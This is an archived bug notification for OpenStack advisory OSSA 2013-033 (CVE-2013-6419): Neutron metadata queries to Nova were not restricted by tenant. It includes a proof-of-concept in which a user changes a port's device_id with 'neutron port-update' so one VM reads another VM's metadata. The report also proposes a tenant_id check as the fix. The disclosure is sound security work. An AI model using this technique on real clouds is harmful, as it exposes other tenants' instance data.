yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #08790
[Bug 1235450] Re: [OSSA 2013-033] Metadata queries from Neutron to Nova are not restricted by tenant (CVE-2013-6419)
** Changed in: neutron
Status: Fix Committed => Fix Released
** Changed in: neutron
Milestone: None => icehouse-2
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1235450
Title:
[OSSA 2013-033] Metadata queries from Neutron to Nova are not
restricted by tenant (CVE-2013-6419)
Status in OpenStack Neutron (virtual network service):
Fix Released
Status in neutron grizzly series:
Fix Committed
Status in neutron havana series:
Fix Released
Status in OpenStack Compute (Nova):
Fix Released
Status in OpenStack Compute (nova) grizzly series:
Fix Committed
Status in OpenStack Compute (nova) havana series:
Fix Released
Status in OpenStack Security Advisories:
Fix Released
Bug description:
The neutron metadata service works in the following way:
Instance makes a GET request to http://169.254.169.254/
This is directed to the metadata-agent which knows which
router(namespace) he is running on and determines the ip_address from
the http request he receives.
Now, the neturon-metadata-agent queries neutron-server using the
router_id and ip_address from the request to determine the port the
request came from. Next, the agent takes the device_id (nova-instance-
id) on the port and passes that to nova as X-Instance-ID.
The vulnerability is that if someone exposes their instance_id their
metadata can be retrieved. In order to exploit this, one would need to
update the device_id on a port to match the instance_id they want to
hijack the data from.
To demonstrate:
arosen@arosen-desktop:~/devstack$ nova list
+--------------------------------------+------+--------+------------+-------------+------------------+
| ID | Name | Status | Task State | Power State | Networks |
+--------------------------------------+------+--------+------------+-------------+------------------+
| 1eb33bf1-6400-483a-9747-e19168b68933 | vm1 | ACTIVE | None | Running | private=10.0.0.4 |
| eed973e2-58ea-42c4-858d-582ff6ac3a51 | vm2 | ACTIVE | None | Running | private=10.0.0.3 |
+--------------------------------------+------+--------+------------+-------------+------------------+
arosen@arosen-desktop:~/devstack$ neutron port-list
+--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
| id | name | mac_address | fixed_ips |
+--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
| 3128f195-c41b-4160-9a42-40e024771323 | | fa:16:3e:7d:a5:df | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.1"} |
| 62465157-8494-4fb7-bdce-2b8697f03c12 | | fa:16:3e:94:62:47 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.4"} |
| 8473fb8d-b649-4281-b03a-06febf61b400 | | fa:16:3e:4f:a3:b0 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.2"} |
| 92c42c1a-efb0-46a6-89eb-a38ae170d76d | | fa:16:3e:de:9a:39 | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.3"} |
+--------------------------------------+------+-------------------+---------------------------------------------------------------------------------+
arosen@arosen-desktop:~/devstack$ neutron port-show 62465157-8494-4fb7-bdce-2b8697f03c12
+-----------------------+---------------------------------------------------------------------------------+
| Field | Value |
+-----------------------+---------------------------------------------------------------------------------+
| admin_state_up | True |
| allowed_address_pairs | |
| device_id | 1eb33bf1-6400-483a-9747-e19168b68933 |
| device_owner | compute:None |
| extra_dhcp_opts | |
| fixed_ips | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.4"} |
| id | 62465157-8494-4fb7-bdce-2b8697f03c12 |
| mac_address | fa:16:3e:94:62:47 |
| name | |
| network_id | 5f68c45d-b729-4e21-9ded-089848eb4ef2 |
| security_groups | 3e29d8e7-0195-4438-a49a-9706736b888d |
| status | ACTIVE |
| tenant_id | 0f9d696fc73d4110ab492ca105881b9b |
+-----------------------+---------------------------------------------------------------------------------+
arosen@arosen-desktop:~/devstack$ neutron port-show 92c42c1a-efb0-46a6-89eb-a38ae170d76d
+-----------------------+---------------------------------------------------------------------------------+
| Field | Value |
+-----------------------+---------------------------------------------------------------------------------+
| admin_state_up | True |
| allowed_address_pairs | |
| device_id | eed973e2-58ea-42c4-858d-582ff6ac3a51 |
| device_owner | compute:None |
| extra_dhcp_opts | |
| fixed_ips | {"subnet_id": "d5cbaa98-ecf0-495c-b009-b5ea6160259b", "ip_address": "10.0.0.3"} |
| id | 92c42c1a-efb0-46a6-89eb-a38ae170d76d |
| mac_address | fa:16:3e:de:9a:39 |
| name | |
| network_id | 5f68c45d-b729-4e21-9ded-089848eb4ef2 |
| security_groups | 3e29d8e7-0195-4438-a49a-9706736b888d |
| status | ACTIVE |
| tenant_id | 0f9d696fc73d4110ab492ca105881b9b |
+-----------------------+---------------------------------------------------------------------------------+
From vm2 (eed973e2-58ea-42c4-858d-582ff6ac3a51):
$ curl http://169.254.169.254/latest/meta-data/hostname
vm2.novalocal
arosen@arosen-desktop:~/devstack$ neutron port-update 92c42c1a-
efb0-46a6-89eb-a38ae170d76d
--device_id=1eb33bf1-6400-483a-9747-e19168b68933
From vm2 (eed973e2-58ea-42c4-858d-582ff6ac3a51):
$ curl http://169.254.169.254/latest/meta-data/hostname
vm1.novalocal
In order to fix this issue I believe we need to also pass the tenant-id in the metadata request to nova. When nova receives the request it will now have to query it's database using the instance_id and check that the tenant_id's match. Using the tenant_id solves this issue as the user is not allowed to specify or update this field.
To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1235450/+subscriptions
